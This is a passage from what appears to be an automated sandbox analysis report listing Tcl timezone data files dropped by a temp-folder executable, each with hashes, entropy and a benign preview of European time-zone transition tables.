                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Istanbul) {. {-9223372036854775808 6952 0 LMT}. {-2840147752 7016 0 IMT}. {-1869875816 7200 0 EET}. {-1693706400 10800 1 EEST}. {-1680490800 7200 0 EET}. {-1570413600 10800 1 EEST}. {-1552186800 7200 0 EET}. {-1538359200 10800 1 EEST}. {-1522551600 7200 0 EET}. {-1507514400 10800 1 EEST}. {-1490583600 7200 0 EET}. {-1440208800 10800 1 EEST}. {-1428030000 7200 0 EET}. {-1409709600 10800 1 EEST}. {-1396494000 7200 0 EET}. {-931140000 10800 1 EEST}. {-922762800 7200 0 EET}. {-917834400 10800 1 EEST}. {-892436400 7200 0 EET}. {-875844000 10800 1 EEST}. {-857358000 7200 0 EET}. {-781063200 10800 1 EEST}. {-764737200 7200 0 EET}. {-744343200 10800 1 EEST}. {-733806000 7200 0 EET}. {-716436000 10800 1 EEST}. {-701924400 7200 0 EET}. {-684986400 10800 1 EEST}. {-670474800 7200 0 EET}. {-654141600 10800 1 EEST}. {-639025200 7200 0 EET}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):176
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.831245786685746
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVxKL82wFVAIgoqyKL8p6yQap6cEBx/yQavKL8i:SlSWB9IZaM3ymvKA2wFVAIgovKAUyzO5
                                                                                                                                                                                                                                                                                                                                MD5:F43ABA235B8B98F5C64181ABD1CEEC3A
                                                                                                                                                                                                                                                                                                                                SHA1:A4A7D71ED148FBE53C2DF7497A89715EB24E84B7
                                                                                                                                                                                                                                                                                                                                SHA-256:8E97798BE473F535816D6D9307B85102C03CC860D3690FE59E0B7EEF94D62D54
                                                                                                                                                                                                                                                                                                                                SHA-512:B0E0FC97F08CB656E228353594FC907FC94A998859BB22648BF78043063932D0FC7282D31F63FCB79216218695B5DCDF298C37F0CB206160798CF3CA2C7598E1
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/London)]} {. LoadTimeZoneFile Europe/London.}.set TZData(:Europe/Jersey) $TZData(:Europe/London).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2397
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8622541648513464
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:cGv6a621nwJ2JoJrv0WvXlnDqVV0Qv3LEevBFoBGrjI9q1F008bBJd8:cGvt67yurvxXl6V/DYtX6
                                                                                                                                                                                                                                                                                                                                MD5:FE44AD99AF96A031D21D308B0E534928
                                                                                                                                                                                                                                                                                                                                SHA1:36A666585D0895155D31A6E5AFD6B7395C7334AA
                                                                                                                                                                                                                                                                                                                                SHA-256:0C65366AB59C4B8734DE0F69E7081269A367116363EB3863D16FB7184CCC5EB9
                                                                                                                                                                                                                                                                                                                                SHA-512:2789E8FC8FD73A0D3C915F5CBAD158D2A4995EE51607C4368F3AE1CC6418E93E204E4FCE6F796CDC60BB2E0ED8F79650DA4549C7663589B58E189D0D10F059C5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Kaliningrad) {. {-9223372036854775808 4920 0 LMT}. {-2422056120 3600 0 CET}. {-1693706400 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-938905200 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-788922000 7200 0 CET}. {-778730400 10800 1 CEST}. {-762663600 7200 0 CET}. {-757389600 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7202
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6738341956502953
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:j/fE2JyurpyVaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtOEZ2:j/fN8GHh2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                                                                                                MD5:4E693AC10DD3FC66700A878B94D3701D
                                                                                                                                                                                                                                                                                                                                SHA1:692200B78A3EA482577D13BE5588FEB0BF94DF01
                                                                                                                                                                                                                                                                                                                                SHA-256:3AAC94E73BB4C803BBB4DE14826DAA0AC82BAE5C0841FD7C58B62A5C155C064D
                                                                                                                                                                                                                                                                                                                                SHA-512:9B68D418B98DDF855C257890376AEC300FC6024E08C85AF5CFFE70BE9AC39D75293C35D841DB8A7BE5574FD185D736F5CB72205531736A202D25305744A2DD15
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Kiev) {. {-9223372036854775808 7324 0 LMT}. {-2840148124 7324 0 KMT}. {-1441159324 7200 0 EET}. {-1247536800 10800 0 MSK}. {-892522800 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-825382800 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 14400 1 MSD}. {622594800 10800 0 MSK}. {638319600 14400 1 MSD}. {646786800 10800 1 EEST}. {686102400 7200 0 EET}. {701820000 10800 1 EEST}. {717541200 7200 0 EET}. {733269600 1
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1959
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5751912319178496
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:c1e/5gjS+OVkb/cXODnOwUDOS5u8OimFeb/ROHc9qOYNkw/O2blbEUhtCUH9mUBR:dWDTZVemFLN7NBx333+ix6b0JiG1
                                                                                                                                                                                                                                                                                                                                MD5:249037A8019D3A5244DD59D8C3316403
                                                                                                                                                                                                                                                                                                                                SHA1:2DABDE83753CE65D1A2D3949FF9B94401A2DD8C3
                                                                                                                                                                                                                                                                                                                                SHA-256:5FE8535DD9A4729B68BF5EC178C6F978753A4A01BDC6F5529C2F8A3872B470D1
                                                                                                                                                                                                                                                                                                                                SHA-512:4180DE17FDDA1417DD24229F775DD45FDE99078E71F2A583E6629D022DCD1B30CEB1ABCEEC78286CAE286E8CBAFC5A7AB20464D53B8BE2615B4681302C05B120
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Kirov) {. {-9223372036854775808 11928 0 LMT}. {-1593820800 10800 0 +03}. {-1247540400 14400 0 +05}. {354916800 18000 1 +05}. {370724400 14400 0 +04}. {386452800 18000 1 +05}. {402260400 14400 0 +04}. {417988800 18000 1 +05}. {433796400 14400 0 +04}. {449611200 18000 1 +05}. {465343200 14400 0 +04}. {481068000 18000 1 +05}. {496792800 14400 0 +04}. {512517600 18000 1 +05}. {528242400 14400 0 +04}. {543967200 18000 1 +05}. {559692000 14400 0 +04}. {575416800 18000 1 +05}. {591141600 14400 0 +04}. {606866400 10800 0 +04}. {606870000 14400 1 +04}. {622594800 10800 0 +03}. {638319600 14400 1 +04}. {654649200 10800 0 +03}. {670374000 14400 0 +04}. {701820000 10800 0 +04}. {701823600 14400 1 +04}. {717548400 10800 0 +03}. {733273200 14400 1 +04}. {748998000 10800 0 +03}. {764722800 14400 1 +04}. {780447600 10800 0 +03}. {796172400 1
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):9471
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.738653060534981
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:1SgVSz+IZHX68PlXIFj544IrvfMsbxZTH7qwQ:1SYSz+IZHX68PlYFUM8xZTH7qwQ
                                                                                                                                                                                                                                                                                                                                MD5:AD82B05F966F0EAD5B2F4FD7B6D56718
                                                                                                                                                                                                                                                                                                                                SHA1:DE5A9BB8B0FCA79C38DD35905FF074503D5AAF13
                                                                                                                                                                                                                                                                                                                                SHA-256:EE61A08BED392B75FBE67666BDCF7CE26DFA570FC2D1DEC9FFEF51E5D8CD8DF7
                                                                                                                                                                                                                                                                                                                                SHA-512:68DC078090E2AF1EAF0150BBCF63E52E4675BF22E2FF6BBA4B4D0B244BFF23C73310A3E63365A4217B8466F2C2E7A4384D05D778F70513183B3A59016A55DDB0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Lisbon) {. {-9223372036854775808 -2205 0 LMT}. {-2713908195 -2205 0 LMT}. {-1830384000 0 0 WET}. {-1689555600 3600 1 WEST}. {-1677801600 0 0 WET}. {-1667437200 3600 1 WEST}. {-1647738000 0 0 WET}. {-1635814800 3600 1 WEST}. {-1616202000 0 0 WET}. {-1604365200 3600 1 WEST}. {-1584666000 0 0 WET}. {-1572742800 3600 1 WEST}. {-1553043600 0 0 WET}. {-1541206800 3600 1 WEST}. {-1521507600 0 0 WET}. {-1442451600 3600 1 WEST}. {-1426813200 0 0 WET}. {-1379293200 3600 1 WEST}. {-1364778000 0 0 WET}. {-1348448400 3600 1 WEST}. {-1333328400 0 0 WET}. {-1316394000 3600 1 WEST}. {-1301274000 0 0 WET}. {-1284339600 3600 1 WEST}. {-1269824400 0 0 WET}. {-1221440400 3600 1 WEST}. {-1206925200 0 0 WET}. {-1191200400 3600 1 WEST}. {-1175475600 0 0 WET}. {-1127696400 3600 1 WEST}. {-1111971600 0 0 WET}. {-1096851600 3600 1 WEST}. {-1080522000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):185
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.901869793666386
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxV/sUE2tvFVAIgoq8sUE2vqLyQavPSJ5QahsUE2u:SlSWB9IZaM3ymhrE2tvFVAIgohrE2vqm
                                                                                                                                                                                                                                                                                                                                MD5:5F2AEC41DECD9E26955876080C56B247
                                                                                                                                                                                                                                                                                                                                SHA1:4FDEC0926933AE5651DE095C519A2C4F9E567691
                                                                                                                                                                                                                                                                                                                                SHA-256:88146DA16536CCF587907511FB0EDF40E392E6F6A6EFAB38260D3345CF2832E1
                                                                                                                                                                                                                                                                                                                                SHA-512:B71B6C21071DED75B9B36D49EB5A779C5F74817FF070F70FEAB9E3E719E5F1937867547852052AA7BBAE8B842493FBC7DFAFD3AC47B70D36893541419DDB2D74
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Belgrade)]} {. LoadTimeZoneFile Europe/Belgrade.}.set TZData(:Europe/Ljubljana) $TZData(:Europe/Belgrade).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):9839
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.737361476589814
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:Gj4y1xZfvm8nKrhFs3XRnRaQqTLJaMt/VZ1R6Y+:GjPxZfvmgEhS3XRmau/VZ1R6Y+
                                                                                                                                                                                                                                                                                                                                MD5:2A53A87C26A5D2AF62ECAAD8CECBF0D7
                                                                                                                                                                                                                                                                                                                                SHA1:025D31C1D32F1100C1B00858929FD29B4E66E8F6
                                                                                                                                                                                                                                                                                                                                SHA-256:2A69A7C9A2EE3057EBDB2615DBE5CB08F5D334210449DC3E42EA88564C29583A
                                                                                                                                                                                                                                                                                                                                SHA-512:81EFA13E4AB30A9363E80EC1F464CC51F8DF3C492771494F3624844E074BA9B84FE50EF6C32F9467E6DAB41BD5159B492B752D0C97F3CB2F4B698C04E68C0255
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/London) {. {-9223372036854775808 -75 0 LMT}. {-3852662325 0 0 GMT}. {-1691964000 3600 1 BST}. {-1680472800 0 0 GMT}. {-1664143200 3600 1 BST}. {-1650146400 0 0 GMT}. {-1633903200 3600 1 BST}. {-1617487200 0 0 GMT}. {-1601848800 3600 1 BST}. {-1586037600 0 0 GMT}. {-1570399200 3600 1 BST}. {-1552168800 0 0 GMT}. {-1538344800 3600 1 BST}. {-1522533600 0 0 GMT}. {-1507500000 3600 1 BST}. {-1490565600 0 0 GMT}. {-1473631200 3600 1 BST}. {-1460930400 0 0 GMT}. {-1442786400 3600 1 BST}. {-1428876000 0 0 GMT}. {-1410732000 3600 1 BST}. {-1396216800 0 0 GMT}. {-1379282400 3600 1 BST}. {-1364767200 0 0 GMT}. {-1348437600 3600 1 BST}. {-1333317600 0 0 GMT}. {-1315778400 3600 1 BST}. {-1301263200 0 0 GMT}. {-1284328800 3600 1 BST}. {-1269813600 0 0 GMT}. {-1253484000 3600 1 BST}. {-1238364000 0 0 GMT}. {-1221429600 3600 1 BST}. {-120
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8826
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7634145613638657
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:TYt4c9+dcVhv9HMLftvDGwdSscRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAr:0w2h1QSTRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                                                                                                MD5:804A17ED0B32B9751C38110D28EB418B
                                                                                                                                                                                                                                                                                                                                SHA1:24235897E163D33970451C48C4260F6C10C56ADD
                                                                                                                                                                                                                                                                                                                                SHA-256:00E8152B3E5CD216E4FD8A992250C46E600E2AD773EEDDD87DAD31012BE55693
                                                                                                                                                                                                                                                                                                                                SHA-512:53AFDDE8D516CED5C6CF0A906DBF72AF09A62278D1FC4D5C1562BBCE853D322457A6346C3DE8F112FCF665102E19A2E677972E941D0C80D0AB7C8DD0B694628E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Luxembourg) {. {-9223372036854775808 1476 0 LMT}. {-2069713476 3600 0 CET}. {-1692496800 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1662343200 7200 1 CEST}. {-1650157200 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-1612659600 0 0 WET}. {-1604278800 3600 1 WEST}. {-1585519200 0 0 WET}. {-1574038800 3600 1 WEST}. {-1552258800 0 0 WET}. {-1539997200 3600 1 WEST}. {-1520550000 0 0 WET}. {-1507510800 3600 1 WEST}. {-1490572800 0 0 WET}. {-1473642000 3600 1 WEST}. {-1459119600 0 0 WET}. {-1444006800 3600 1 WEST}. {-1427673600 0 0 WET}. {-1411866000 3600 1 WEST}. {-1396224000 0 0 WET}. {-1379293200 3600 1 WEST}. {-1364774400 0 0 WET}. {-1348448400 3600 1 WEST}. {-1333324800 0 0 WET}. {-1316394000 3600 1 WEST}. {-1301270400 0 0 WET}. {-1284339600 3600 1 WEST}. {-1269813600 0 0 WET}. {-1253484000 3600 1 WEST}. {-
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8225
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.745589534746728
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:kHF0p8d9VPb/aKrwSSscRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVab:oNHzy8STRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                                                                                                MD5:795CAAE9AECE3900DEA1F5EBD0ED668B
                                                                                                                                                                                                                                                                                                                                SHA1:61F1745E7B60E19F1286864B7A4285E8CCF11202
                                                                                                                                                                                                                                                                                                                                SHA-256:4BE326DD950DDAD6FB9C392A31CEED1CB1525D043F1F7C14332FEB226AEA1859
                                                                                                                                                                                                                                                                                                                                SHA-512:BBBABBE86A757D3EE9267128E7DA810346E74FD9CD3EF37192A831958FF0EDBBE47F14DA63669F6799056081D0365194E22D64D14B97490E4333504DFE22D151
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Madrid) {. {-9223372036854775808 -884 0 LMT}. {-2177452800 0 0 WET}. {-1631926800 3600 1 WEST}. {-1616889600 0 0 WET}. {-1601168400 3600 1 WEST}. {-1585353600 0 0 WET}. {-1442451600 3600 1 WEST}. {-1427673600 0 0 WET}. {-1379293200 3600 1 WEST}. {-1364774400 0 0 WET}. {-1348448400 3600 1 WEST}. {-1333324800 0 0 WET}. {-1316390400 3600 1 WEST}. {-1301270400 0 0 WET}. {-1284339600 3600 1 WEST}. {-1269820800 0 0 WET}. {-1026954000 3600 1 WEST}. {-1017619200 0 0 WET}. {-1001898000 3600 1 WEST}. {-999482400 7200 1 WEMT}. {-986090400 3600 1 WEST}. {-954115200 0 0 WET}. {-940208400 3600 0 CET}. {-873079200 7200 1 CEST}. {-862621200 3600 0 CET}. {-842839200 7200 1 CEST}. {-828320400 3600 0 CET}. {-811389600 7200 1 CEST}. {-796870800 3600 0 CET}. {-779940000 7200 1 CEST}. {-765421200 3600 0 CET}. {-748490400 7200 1 CEST}. {-733971600
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8425
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.728789296531475
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:wqZKgpNc6sln3mcRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZY:wChslJRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                                                                                                MD5:5F73FCB70E5B27E540C1A5133F3B791C
                                                                                                                                                                                                                                                                                                                                SHA1:406A2FB6439A3532150D69E711F253665F000B3C
                                                                                                                                                                                                                                                                                                                                SHA-256:5E3BB07FD3592163A756596A25060683CDA7930C7F4411A406B3E1506F9B901C
                                                                                                                                                                                                                                                                                                                                SHA-512:5263ABBE91D95BDD359B666BCDDAA6B4C8B810E986B9A94A80AF2B28E48C9C949EC5D5F21158AD306F7AF5BB6A47408C9AA5C5BB6D0053A9B9DA89E76E126FB1
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Malta) {. {-9223372036854775808 3484 0 LMT}. {-2403478684 3600 0 CET}. {-1690765200 7200 1 CEST}. {-1680487200 3600 0 CET}. {-1664758800 7200 1 CEST}. {-1648951200 3600 0 CET}. {-1635123600 7200 1 CEST}. {-1616896800 3600 0 CET}. {-1604278800 7200 1 CEST}. {-1585533600 3600 0 CET}. {-1571014800 7200 1 CEST}. {-1555293600 3600 0 CET}. {-932432400 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812588400 7200 1 CEST}. {-798073200 3600 0 CET}. {-781052400 7200 1 CEST}. {-766717200 3600 0 CET}. {-750898800 7200 1 CEST}. {-733359600 3600 0 CET}. {-719456400 7200 1 CEST}. {-701917200 3600 0 CET}. {-689209200 7200 1 CEST}. {-670460400 3600 0 CET}. {-114051600 7200 1 CEST}. {-103168800 3600 0 CET}. {-81997200 7200 1 CEST}. {-71715600 3600 0 CET}. {-50547600 7200 1 CEST}. {-40266000 3600 0 CET}
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):185
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.913470013356756
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxV1AYKjGyVAIgoq2AYKjvCW6yQausWILMFJ8QarAYKa:SlSWB9IZaM3ymrAdjGyVAIgorAdjoyGK
                                                                                                                                                                                                                                                                                                                                MD5:CFB0DE2E11B8AF400537BD0EF493C004
                                                                                                                                                                                                                                                                                                                                SHA1:32E8FCB8571575E9DFE09A966F88C7D3EBCD183E
                                                                                                                                                                                                                                                                                                                                SHA-256:5F82A28F1FEE42693FD8F3795F8E0D7E8C15BADF1FD9EE4D45794C4C0F36108C
                                                                                                                                                                                                                                                                                                                                SHA-512:9E36B2EACA06F84D56D9A9A0A83C7C106D26A6A55CBAA696729F105600F5A0105F193899D5996C416EFAABC4649E91BA0ED90D38E8DF7B305C6D951A31C80718
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Helsinki)]} {. LoadTimeZoneFile Europe/Helsinki.}.set TZData(:Europe/Mariehamn) $TZData(:Europe/Helsinki).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2102
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8519171770148932
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:K6ccjMsJ2JoJrZXnDqVV0Qv3LEevBFoBGrjI9q1F008bBJdO:PRjMAyurZX6V/DYtXE
                                                                                                                                                                                                                                                                                                                                MD5:E5ECB372FF8F5ED274597551ED2C35F0
                                                                                                                                                                                                                                                                                                                                SHA1:6792E2676C59F43B9F260AF2F33E4C2484E71D64
                                                                                                                                                                                                                                                                                                                                SHA-256:78A57D601978869FCAA2737BEC4FDAB72025BC5FDDF7188CCC89034FA767DA6C
                                                                                                                                                                                                                                                                                                                                SHA-512:261FFB4C7974C5F1C0AECA49D9B26F3BC2998C63CEF9CB168B1060E9EC12F7057DB5376128AFD8A31AF2CC9EF79577E96CD9863AA46AC330A5F057F72E43B7B9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Minsk) {. {-9223372036854775808 6616 0 LMT}. {-2840147416 6600 0 MMT}. {-1441158600 7200 0 EET}. {-1247536800 10800 0 MSK}. {-899780400 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-804646800 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 14400 1 MSD}. {622594800 10800 0 MSK}. {631141200 10800 0 MSK}. {670374000 7200 0 EEMMTT}. {670377600 10800 1 EEST}. {686102400 7200 0 EET}. {7018272
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8871
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7700564621466666
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:2LCV8tXttpD72RXbvDGwdSscRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHT/:eAYt+STRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                                                                                                MD5:B2BA91B2CDD19E255B68EA35E033C061
                                                                                                                                                                                                                                                                                                                                SHA1:246E377E815FFC11BBAF898E952194FBEDAE9AA2
                                                                                                                                                                                                                                                                                                                                SHA-256:768E3D45DB560777C8E13ED9237956CFE8630D840683FAD065A2F6948FD797BE
                                                                                                                                                                                                                                                                                                                                SHA-512:607383524C478F1CB442679F6DE0964F8916EE1A8B0EF6806BDF7652E4520B0E842A611B432FB190C30C391180EA1867268BBBF6067310F70D5E72CB3E4D789F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Monaco) {. {-9223372036854775808 1772 0 LMT}. {-2486680172 561 0 PMT}. {-1855958961 0 0 WET}. {-1689814800 3600 1 WEST}. {-1680397200 0 0 WET}. {-1665363600 3600 1 WEST}. {-1648342800 0 0 WET}. {-1635123600 3600 1 WEST}. {-1616893200 0 0 WET}. {-1604278800 3600 1 WEST}. {-1585443600 0 0 WET}. {-1574038800 3600 1 WEST}. {-1552266000 0 0 WET}. {-1539997200 3600 1 WEST}. {-1520557200 0 0 WET}. {-1507510800 3600 1 WEST}. {-1490576400 0 0 WET}. {-1470618000 3600 1 WEST}. {-1459126800 0 0 WET}. {-1444006800 3600 1 WEST}. {-1427677200 0 0 WET}. {-1411952400 3600 1 WEST}. {-1396227600 0 0 WET}. {-1379293200 3600 1 WEST}. {-1364778000 0 0 WET}. {-1348448400 3600 1 WEST}. {-1333328400 0 0 WET}. {-1316394000 3600 1 WEST}. {-1301274000 0 0 WET}. {-1284339600 3600 1 WEST}. {-1269824400 0 0 WET}. {-1253494800 3600 1 WEST}. {-1238374800 0 0
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2347
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.859849674605335
                                                                                                                                                                                                                                                                                                                                Encrypted:false
